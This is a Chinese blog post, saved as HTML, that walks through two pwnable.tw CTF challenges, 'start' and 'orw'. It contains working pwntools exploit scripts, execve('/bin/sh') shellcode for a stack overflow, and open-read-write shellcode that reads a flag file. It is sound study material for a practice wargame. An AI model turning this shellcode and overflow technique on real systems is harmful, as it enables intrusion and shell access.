

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="https://image.0error.net/favicon.png">
  <link rel="icon" href="https://image.0error.net/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Jason Chen">
  <meta name="keywords" content="">
  
    <meta name="description" content="Pwnable_tw笔记pwnable开坑了，希望自己能把这个大坑补完，近期和学长交流了一下，受益颇多，也深深感受到了自己水平上的差距，再次清醒认识到自己是蒟蒻(，所以遵从勤能补拙的思路，希望通过多积累和见识题目真正在System方面有所深入 start拿到手先赶紧进行一个checksec  这里推荐最好用多个工具检查一番，因为看网上有人说peda检测此程序会提示开了NX，实则没有，这样会让做题人">
<meta property="og:type" content="article">
<meta property="og:title" content="pwnable_tw笔记">
<meta property="og:url" content="https://www.0error.net/2022/09/51647.html">
<meta property="og:site_name" content="Do1phln&#39;s Blog">
<meta property="og:description" content="Pwnable_tw笔记pwnable开坑了，希望自己能把这个大坑补完，近期和学长交流了一下，受益颇多，也深深感受到了自己水平上的差距，再次清醒认识到自己是蒟蒻(，所以遵从勤能补拙的思路，希望通过多积累和见识题目真正在System方面有所深入 start拿到手先赶紧进行一个checksec  这里推荐最好用多个工具检查一番，因为看网上有人说peda检测此程序会提示开了NX，实则没有，这样会让做题人">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://image.0error.net/img/2022/20220917201655.png">
<meta property="og:image" content="https://image.0error.net/img/2022/20220917202057.png">
<meta property="og:image" content="https://image.0error.net/img/2022/20220917203221.png">
<meta property="og:image" content="https://image.0error.net/img/2022/20220917203409.png">
<meta property="og:image" content="https://image.0error.net/img/2022/20220917203459.png">
<meta property="og:image" content="https://image.0error.net/img/2022/20220917204007.png">
<meta property="og:image" content="https://image.0error.net/img/2022/20220917200933.png">
<meta property="og:image" content="https://image.0error.net/img/202220220918222500.png">
<meta property="og:image" content="https://image.0error.net/img/202220220918222957.png">
<meta property="og:image" content="https://image.0error.net/img/202220220918223823.png">
<meta property="og:image" content="https://image.0error.net/img/2022/20220919143530.png">
<meta property="article:published_time" content="2022-09-17T12:53:36.000Z">
<meta property="article:modified_time" content="2023-11-08T04:25:37.557Z">
<meta property="article:author" content="Jason Chen">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="pwn">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://image.0error.net/img/2022/20220917201655.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>pwnable_tw笔记 - Do1phln&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"www.0error.net","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":50,"cursorChar":"|","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":200}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":"bad56014d4869a580f4ebb27cf549354","google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  
    <!-- Baidu Analytics -->
    <script async>
      if (!Fluid.ctx.dnt) {
        var _hmt = _hmt || [];
        (function() {
          var hm = document.createElement("script");
          hm.src = "https://hm.baidu.com/hm.js?bad56014d4869a580f4ebb27cf549354";
          var s = document.getElementsByTagName("script")[0];
          s.parentNode.insertBefore(hm, s);
        })();
      }
    </script>
  

  

  

  

  

  

  



  
<meta name="generator" content="Hexo 6.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Do1phln&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('https://image.0error.net/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="pwnable_tw笔记"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-09-17 20:53" pubdate>
          2022年9月17日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          <!-- compatible with older versions-->
          全文共有 5k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          <!-- compatible with older versions-->
          阅读全文预计需要 42 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">pwnable_tw笔记</h1>
            
              <p class="note note-info">
                
                  
                    <!-- compatible with older versions-->
                    本文最后更新于：2023年11月8日 中午
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h1 id="Pwnable-tw笔记"><a href="#Pwnable-tw笔记" class="headerlink" title="Pwnable_tw笔记"></a>Pwnable_tw笔记</h1><p>pwnable开坑了，希望自己能把这个大坑补完，近期和学长交流了一下，受益颇多，也深深感受到了自己水平上的差距，再次清醒认识到自己是蒟蒻(，所以遵从勤能补拙的思路，希望通过多积累和见识题目真正在System方面有所深入</p>
<h2 id="start"><a href="#start" class="headerlink" title="start"></a>start</h2><p>拿到手先赶紧进行一个checksec</p>
<p><img src="https://image.0error.net/img/2022/20220917201655.png" srcset="/img/loading.gif" lazyload></p>
<p>这里推荐最好用多个工具检查一番，因为看网上有人说peda检测此程序会提示开了NX，实则没有，这样会让做题人徒增烦恼 :thinking:</p>
<blockquote>
<p><strong>RELRO(Relocation Read Only)：尽量使存储区域只读</strong></p>
</blockquote>
<p>接着进行一个IDA的分析</p>
<p><img src="https://image.0error.net/img/2022/20220917202057.png" srcset="/img/loading.gif" lazyload></p>
<p>这里可以看到使用了int80方式的系统函数调用方法</p>
<blockquote>
<h3 id="INT-80h-系统调用方法"><a href="#INT-80h-系统调用方法" class="headerlink" title="INT 80h 系统调用方法"></a><strong>INT 80h 系统调用方法</strong></h3><p><strong>系统调用的过程</strong>可以总结如下：<br>1． 执行用户程序(如:fork)<br>2． 根据glibc中的函数实现，取得系统调用号并执行int $0x80产生中断。<br>3． 进行地址空间的转换和堆栈的切换，执行SAVE_ALL。（进行内核模式）<br>4． 进行中断处理，根据系统调用表调用内核函数。<br>5． 执行内核函数。<br>6． 执行RESTORE_ALL并返回用户模式<br>Linux 32位的系统调用时通过int 80h来实现的，eax寄存器中为调用的功能号，ebx、ecx、edx、esi等等寄存器则依次为参数。</p>
</blockquote>
<p>其中int80调用的系统函数编号可以在<a target="_blank" rel="noopener" href="http://faculty.nps.edu/cseagle/assembly/sys_call.html">网络上找到</a></p>
<p>其中第一个系统调用为将esp(赋给ecx执行)开始的0x14H字节数据写入标准输出，即最终输出<code>Let&#39;s start the CTF.</code></p>
<table>
<thead>
<tr>
<th>name</th>
<th>eax</th>
<th>ebx</th>
<th>ecx</th>
<th>edx</th>
</tr>
</thead>
<tbody><tr>
<td><a target="_blank" rel="noopener" href="https://man7.org/linux/man-pages/man2/write.2.html">sys_write</a></td>
<td>0x04</td>
<td>unsigned int fd &#x3D; 1</td>
<td>const char __user *buf &#x3D; esp</td>
<td>size_t count&#x3D;14H</td>
</tr>
</tbody></table>
<p>第二个系统调用则是从标准输入读取0x3cH字节到栈空间，这里义眼顶针，鉴定为可能可以溢出</p>
<table>
<thead>
<tr>
<th>name</th>
<th>eax</th>
<th>ebx</th>
<th>ecx</th>
<th>edx</th>
</tr>
</thead>
<tbody><tr>
<td><a target="_blank" rel="noopener" href="http://www.kernel.org/doc/man-pages/online/pages/man2/read.2.html">sys_read</a></td>
<td>0x03</td>
<td>unsigned int fd&#x3D;1</td>
<td>char __user *buf&#x3D;esp</td>
<td>size_t count&#x3D;3ch</td>
</tr>
</tbody></table>
<p>现在我们知道了读入应当使用的是<code>read(1,esp,0x3c)</code>，那么下一步就是要找到esp在哪了，通过最后一部分的<code>add esp,14h</code>我们推断start函数使用的是<a target="_blank" rel="noopener" href="https://blog.csdn.net/boildoctor/article/details/121181152">内平栈</a>，几esp距离ret有0x14个字节。我们可以通过gdb来证明猜想。</p>
<p><img src="https://image.0error.net/img/2022/20220917203221.png" srcset="/img/loading.gif" lazyload alt="buf_address"></p>
<p>在这里我们看到了buf的地址，再看ret</p>
<p><img src="https://image.0error.net/img/2022/20220917203409.png" srcset="/img/loading.gif" lazyload alt="ret_address"></p>
<p><img src="https://image.0error.net/img/2022/20220917203459.png" srcset="/img/loading.gif" lazyload></p>
<p>果然就是0x14，所以padding就是<code>&#39;a&#39;*0x14</code>，接下来就是要考虑如何劫持控制流，这里因为保护全没开，所以可以试试ret2shellcode，所以就必须要知道栈的地址，要想泄露栈地址，那么就要考虑使用一下write函数了，当我们在ret的地址填充0x8048089就可以打印出栈的值</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">payload = <span class="hljs-string">&#x27;a&#x27;</span>*<span class="hljs-number">0x14</span> + p32(<span class="hljs-number">0x8048087</span>)<br></code></pre></td></tr></table></figure>

<p>read有60B，我们可以使用的有60B-24B&#x3D;36B，所以我们还得去找一个断点的payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">shellcode=<span class="hljs-string">&#x27;\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80&#x27;</span><br></code></pre></td></tr></table></figure>

<p>查看一下其具体作用</p>
<p><img src="https://image.0error.net/img/2022/20220917204007.png" srcset="/img/loading.gif" lazyload></p>
<p>这就是在做系统调用，所以只要我们把对应获取shell的系统调用的参数放在对应寄存器中，然后执行int80，就可以执行对应的系统调用，此处我们利用如下方式来getshell</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">execve(<span class="hljs-string">&quot;/bin/sh&quot;</span>, NULL, NULL)<br></code></pre></td></tr></table></figure>

<p>其中，该程序是 32 位，所以我们需要使得<br>系统调用号，即 eax 应该为 0xb<br>第一个参数，即 ebx 应该指向 &#x2F;bin&#x2F;sh 的地址，其实执行 sh 的地址也可以。为了4字节对齐，我们用&#x2F;&#x2F;bin&#x2F;sh<br>第二个参数，即 ecx 应该为 0<br>第三个参数，即 edx 应该为 0</p>
<p>这里我们使用<code>xor ecx,ecx</code>来代替原shellcode中的<code>mov ecx,0</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs assembly">xor ecx,ecx<br>xor edx,edx<br>push edx ;\截断字符串<br>push 0x68732f6e ; &#x27;n/sh&#x27;<br>push 0x69622f2f ; &#x27;//bi&#x27;<br>mov ebx,esp<br>mov a1,0xb<br>int 0x80<br></code></pre></td></tr></table></figure>

<p>所以就可以写出如下exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> inspect <span class="hljs-keyword">import</span> stack<br><span class="hljs-keyword">from</span> re <span class="hljs-keyword">import</span> S<br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>contect.log_level=<span class="hljs-string">&quot;debug&quot;</span><br><br>p=process(<span class="hljs-string">&#x27;./start&#x27;</span>)<br><br>payload = <span class="hljs-string">&#x27;a&#x27;</span>*<span class="hljs-number">0x14</span> + p32(<span class="hljs-number">0x8048087</span>)<br>p.sendafter(<span class="hljs-string">&quot;Let&#x27;s start the CTF:&quot;</span>, payload)<br>stack_addr = u32(p.recv(<span class="hljs-number">4</span>))<br><span class="hljs-built_in">print</span> <span class="hljs-string">&#x27;stack_addr: &#x27;</span> + <span class="hljs-built_in">hex</span>(stack_addr)<br><br>shellcode = asm(<span class="hljs-string">&#x27;xor ecx,ecx;xor edx,edx;push edx;push 0x68732f6e;push 0x69622f2f ;mov ebx,esp;mov al,0xb;int 0x80&#x27;</span>)<br>payload = <span class="hljs-string">&#x27;a&#x27;</span>*<span class="hljs-number">0x14</span> + p32(stack_addr+<span class="hljs-number">0x14</span>)+shellcode<br>p.send(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p>成功getshell，最后find一下flag提交即可，大功告成</p>
<p><img src="https://image.0error.net/img/2022/20220917200933.png" srcset="/img/loading.gif" lazyload alt="start_success"></p>
<h2 id="orw"><a href="#orw" class="headerlink" title="orw"></a>orw</h2><p>拿到手这次吸取上个题的经验，先进行一个checksec</p>
<p><img src="https://image.0error.net/img/202220220918222500.png" srcset="/img/loading.gif" lazyload></p>
<p>彳亍，看来pwnable确实对新手最友好，那就继续拖入IDA进行分析</p>
<p><img src="https://image.0error.net/img/202220220918222957.png" srcset="/img/loading.gif" lazyload></p>
<p>看到了<code>orw_seccmop()</code>函数，进入查看是关于系统内部的调用<code>prctl</code>的进程创建和管理内容，不太理解含义，遂Google之，发现是关于沙箱保护的函数，通过这一函数可以划定程序准许用户态调用的系统函数，相当于划定白名单，即题目所言仅开启了open、write、read。这里我们可以用seccomp查看其保护规则。</p>
<p><img src="https://image.0error.net/img/202220220918223823.png" srcset="/img/loading.gif" lazyload></p>
<p>通过分析可知，本题是直接执行了用户remote传来的shellcode，但是通过沙箱机制只授予了write, read, open权限，所以我们需要通过这三个操作获取到flag的值，而flag具体位置在题目里面已经给出了。结合题目意思，可以使用open函数打开flag文件，然后read读出文件内容，最后write输出到控制台。</p>
<p>后面的思路就很简单了，我们只需要调用其open-read-write过程读取出<code>/home/orw/flag</code>下的内容并输出即可，这里有两种方式解决。</p>
<h3 id="0x01-shellcraft一把梭"><a href="#0x01-shellcraft一把梭" class="headerlink" title="0x01. shellcraft一把梭"></a>0x01. shellcraft一把梭</h3><p>shellcraft是一种自动化生成shellcode的工具，只需要你了解pwn的过程和方法，可以大部分避开手搓汇编的过程，放到这个题目里面个人猜测出题人也是想要通过这个方式来解决，因为本题flag路径以及getshell方式已经很明确了（o-r-w），所以我们废话少说，立马开始写shell</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context.log_level=<span class="hljs-string">&quot;debug&quot;</span><br><br>p=remote(<span class="hljs-string">&#x27;chall.pwnable.tw&#x27;</span>, <span class="hljs-number">10001</span>)<br>p.recvuntil(<span class="hljs-string">&#x27;:&#x27;</span>)<br><br>s= <span class="hljs-string">&#x27;&#x27;</span><br>s+=shellcraft.<span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;/home/orw/flag&quot;</span>)<br>s+=shellcraft.read(<span class="hljs-string">&#x27;eax&#x27;</span>,<span class="hljs-string">&#x27;ebp&#x27;</span>,<span class="hljs-number">0x100</span>)<br>s+=shellcraft.write(<span class="hljs-number">1</span>,<span class="hljs-string">&#x27;ebp&#x27;</span>,<span class="hljs-number">0x100</span>)<br>s+= <span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">\nnext:</span><br><span class="hljs-string">jmp next&#x27;&#x27;&#x27;</span><br>p.send(asm(s))<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p><img src="https://image.0error.net/img/2022/20220919143530.png" srcset="/img/loading.gif" lazyload></p>
<p>这样就可以直接getshell</p>
<h3 id="0x02-手搓汇编"><a href="#0x02-手搓汇编" class="headerlink" title="0x02. 手搓汇编"></a>0x02. 手搓汇编</h3><p>鉴于MTCTF因为汇编不熟造成的惨痛经历，个人认为汇编基础还是要牢牢把握，刚好看到也有师傅手搓的WP，遂计划照猫画虎，自己也学习一下。</p>
<p>我们选择x86 syscall构造出 <code>open</code> <code>read</code> <code>write</code></p>
<ul>
<li><pre><code class="hljs">open(file=&#39;esp&#39;, oflag=&#39;O_RDONLY&#39;, mode=0)
<figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs applescript"><br>  - 这里可以直接用pwntools给出的写法<br><br>- ```<br>  <span class="hljs-built_in">read</span>(fd, buf, <span class="hljs-built_in">length</span>)<br></code></pre></td></tr></table></figure>

- `eax` 是 0x3
- `fd` 存在 `open()` 的回传結果 (`eax`)
- `buf` 在 `esp`
- `length` 为 60，任意数值，能够覆盖flag即可
</code></pre>
</li>
<li><p>&#96;&#96;&#96;<br>write(stdout, buf, length)</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><code class="hljs x86asm"><br>  - <span class="hljs-string">`eax`</span> 是 <span class="hljs-number">0x4</span><br>  - <span class="hljs-string">`stdout`</span> 是 <span class="hljs-number">1</span><br>  - <span class="hljs-string">`buf`</span> 是刚刚读取的 <span class="hljs-string">`esp`</span><br>  - <span class="hljs-string">`length`</span> 是 <span class="hljs-number">60</span>，参照read的length<br><br>可以得出的汇编代码如下<br><br><span class="hljs-string">```</span>assembly<br>/* <span class="hljs-keyword">push</span> <span class="hljs-string">&#x27;/home/orw/flag\x00&#x27;</span> */<br>        <span class="hljs-keyword">push</span> <span class="hljs-number">0x1010101</span><br>        <span class="hljs-keyword">xor</span> <span class="hljs-built_in">dword</span> <span class="hljs-built_in">ptr</span> [<span class="hljs-built_in">esp</span>], <span class="hljs-number">0x1016660</span><br>        <span class="hljs-keyword">push</span> <span class="hljs-number">0x6c662f77</span><br>        <span class="hljs-keyword">push</span> <span class="hljs-number">0x726f2f65</span><br>        <span class="hljs-keyword">push</span> <span class="hljs-number">0x6d6f682f</span><br>/* open(file=<span class="hljs-string">&#x27;esp&#x27;</span>, oflag=<span class="hljs-string">&#x27;O_RDONLY&#x27;</span>, mode=<span class="hljs-number">0</span>) */<br>        <span class="hljs-keyword">mov</span> <span class="hljs-built_in">ebx</span>, <span class="hljs-built_in">esp</span><br>        <span class="hljs-keyword">xor</span> <span class="hljs-built_in">ecx</span>, <span class="hljs-built_in">ecx</span><br>        <span class="hljs-keyword">xor</span> <span class="hljs-built_in">edx</span>, <span class="hljs-built_in">edx</span><br>/* <span class="hljs-keyword">call</span> open() */<br>		<span class="hljs-keyword">xor</span> <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">eax</span><span class="hljs-comment">;</span><br>		<span class="hljs-keyword">mov</span> <span class="hljs-built_in">al</span>,<span class="hljs-number">0x5</span><span class="hljs-comment">;</span><br>		<span class="hljs-keyword">int</span> <span class="hljs-number">0x80</span><span class="hljs-comment">;</span><br>/*<span class="hljs-keyword">call</span> read()*/<br>		<span class="hljs-keyword">mov</span> <span class="hljs-built_in">ebx</span>,<span class="hljs-built_in">eax</span><span class="hljs-comment">;</span><br>		<span class="hljs-keyword">xor</span> <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">eax</span><span class="hljs-comment">;</span><br>		<span class="hljs-keyword">mov</span> <span class="hljs-built_in">al</span>,<span class="hljs-number">0x3</span><span class="hljs-comment">;</span><br>		<span class="hljs-keyword">mov</span> <span class="hljs-built_in">ecx</span>,<span class="hljs-built_in">esp</span><span class="hljs-comment">;</span><br>		<span class="hljs-keyword">mov</span> <span class="hljs-built_in">dl</span>,<span class="hljs-number">0x30</span><span class="hljs-comment">;</span><br>		<span class="hljs-keyword">int</span> <span class="hljs-number">0x80</span><span class="hljs-comment">;</span><br>/*<span class="hljs-keyword">call</span> write()*/<br>		<span class="hljs-keyword">mov</span> <span class="hljs-built_in">al</span>,<span class="hljs-number">0x4</span><span class="hljs-comment">;</span><br>		<span class="hljs-keyword">mov</span> <span class="hljs-built_in">bl</span>,<span class="hljs-number">1</span><span class="hljs-comment">;</span><br>		<span class="hljs-keyword">mov</span> <span class="hljs-built_in">dl</span>,<span class="hljs-number">0x30</span><span class="hljs-comment">;</span><br>		<span class="hljs-keyword">int</span> <span class="hljs-number">0x80</span><span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure></li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context.log_level=<span class="hljs-string">&quot;debug&quot;</span><br><br>p=remote(<span class="hljs-string">&#x27;chall.pwnable.tw&#x27;</span>, <span class="hljs-number">10001</span>)<br><span class="hljs-comment">#p=process(&#x27;./start&#x27;)</span><br><br><span class="hljs-built_in">print</span> <span class="hljs-built_in">hex</span>(u32(<span class="hljs-string">&#x27;ag&#x27;</span>+<span class="hljs-built_in">chr</span>(<span class="hljs-number">0</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">0</span>)))+<span class="hljs-built_in">hex</span>(u32(<span class="hljs-string">&#x27;w/fl&#x27;</span>))+<span class="hljs-built_in">hex</span>(u32(<span class="hljs-string">&#x27;e/or&#x27;</span>))+<span class="hljs-built_in">hex</span>(u32(<span class="hljs-string">&#x27;/hom&#x27;</span>))<br>p.recvuntil(<span class="hljs-string">&#x27;:&#x27;</span>)<br>shellcode=<span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">push 0x1010101;</span><br><span class="hljs-string">xor dword ptr [esp], 0x1016660;</span><br><span class="hljs-string">push 0x6c662f77;</span><br><span class="hljs-string">push 0x726f2f65;</span><br><span class="hljs-string">push 0x6d6f682f;</span><br><span class="hljs-string">mov ebx,esp;</span><br><span class="hljs-string">xor ecx,ecx;</span><br><span class="hljs-string">xor edx,edx;</span><br><span class="hljs-string">xor eax,eax;</span><br><span class="hljs-string">mov al,0x5;</span><br><span class="hljs-string">int 0x80;</span><br><span class="hljs-string">mov ebx,eax;</span><br><span class="hljs-string">xor eax,eax;</span><br><span class="hljs-string">mov al,0x3;</span><br><span class="hljs-string">mov ecx,esp;</span><br><span class="hljs-string">mov dl,0x30;</span><br><span class="hljs-string">int 0x80;</span><br><span class="hljs-string">mov al,0x4;</span><br><span class="hljs-string">mov bl,1;</span><br><span class="hljs-string">mov dl,0x30;</span><br><span class="hljs-string">int 0x80;</span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><br><span class="hljs-comment">#payload = &#x27;a&#x27;*0x14 + p32(stack_addr+0x14)+shellcode</span><br>p.send(asm(shellcode))<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p>也可得出最终结果</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/CTF/">#CTF</a>
      
        <a href="/tags/pwn/">#pwn</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>pwnable_tw笔记</div>
      <div>https://www.0error.net/2022/09/51647.html</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Jason Chen</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2022年9月17日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
